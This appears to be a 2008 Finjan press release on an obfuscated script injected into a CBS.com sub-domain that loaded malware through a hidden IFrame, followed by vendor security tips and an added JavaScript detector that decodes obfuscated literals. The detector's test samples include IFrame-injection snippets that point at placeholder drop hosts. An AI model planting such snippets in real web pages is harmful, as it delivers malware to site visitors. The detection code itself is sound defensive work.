Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals

Finjan, a leader in secure web gateway products, has warned Internet users to be on their guard following the apparent compromise of a web page on one of the sub-domains of the CBS.com portal.
"The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server located in Russia," said Yuval Ben-Itzhak, Finjan's CTO.
Fortunately for CBS site visitors, Finjan reports that action has already been taken to take that Russian server offline.
Finjan's CTO says the company's MCRC (Malicious Code Research Center) has notified CBS of the problem, and the team expects the page in question to be taken offline and/or replaced with the original data.
"This saga confirms our many previous warnings that obfuscated code poses a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.
"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.
Finjan's security tips and notes to prevent infection:
For businesses:
1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites
For consumers:
1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com)
2. Exercise caution when accessing Web 2.0-enabled sites, e.g. social networking portals, wikis and blogs.
3. Do not rely just on signature-based IT security applications
For all users:
1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an 'expert system in a box', safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.
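As an added illustration (not Finjan's engine and not part of the original release), the sketch below shows why a static signature for an IFrame misses an obfuscated injector, and how decoding the script's literals before judging it exposes the hidden IFrame and its host. It is a simple static stand-in for the behaviour-based analysis described above; all function names, sample scripts and the `example.invalid` hosts are constructed.

```javascript
// Added illustration (not Finjan's engine); names and sample scripts are constructed.
const SIGNATURE = /<iframe\b/i; // what a naive static signature looks for
const SINKS = /\b(document\.write(ln)?|eval|innerHTML|createElement)\b/;
const IFRAME_HOST = /<iframe[^>]*\bsrc=["']?\s*(?:https?:)?\/\/([^\/"'\s>]+)/gi;

// One pass over common literal encodings used to hide markup from signatures.
function decodeOnce(src) {
  const chr = (_, hex) => String.fromCharCode(parseInt(hex, 16));
  return src
    .replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, list) =>
      JSON.stringify(String.fromCharCode(...list.split(',').map(Number))))
    .replace(/\\x([0-9a-f]{2})/gi, chr)  // "\x3c" -> "<"
    .replace(/%([0-9a-f]{2})/gi, chr)    // "%3C"  -> "<"
    .replace(/(["'])\s*\+\s*\1/g, '');   // "<if" + "rame" -> "<iframe"
}

// Decode until nothing changes (bounded), then judge the decoded form.
function analyse(src, maxLayers = 5) {
  let decoded = src, layers = 0;
  for (; layers < maxLayers; layers++) {
    const next = decodeOnce(decoded);
    if (next === decoded) break;
    decoded = next;
  }
  const signatureHit = SIGNATURE.test(src);
  const hidden = !signatureHit && SIGNATURE.test(decoded) && SINKS.test(decoded);
  return {
    signatureHit, layers,
    hosts: [...decoded.matchAll(IFRAME_HOST)].map(m => m[1]),
    verdict: signatureHit ? 'plain-iframe' : hidden ? 'obfuscated-iframe' : 'clean',
  };
}

// Constructed sample scripts; hosts use the reserved .invalid TLD.
const SAMPLES = {
  plain: `document.write('<iframe src="http://ads.example.invalid/x"></iframe>');`,
  percent: `document.write(unescape('%3Cifr' + 'ame%20src%3D%22http%3A//drop.example.invalid/in.php%22%20width%3D0%3E%3C/iframe%3E'));`,
  hex: String.raw`var s = "\x3cif" + "rame src=//drop.example.invalid/a>"; document.body.innerHTML += s;`,
  benign: `document.getElementById('nav').className = 'open';`,
};

for (const [name, src] of Object.entries(SAMPLES)) console.log(name, analyse(src));
```

The two obfuscated samples never contain the literal string the signature looks for, yet both resolve to an IFrame written through a DOM sink once their literals are decoded.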
For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103
28.11.2008, Finjan

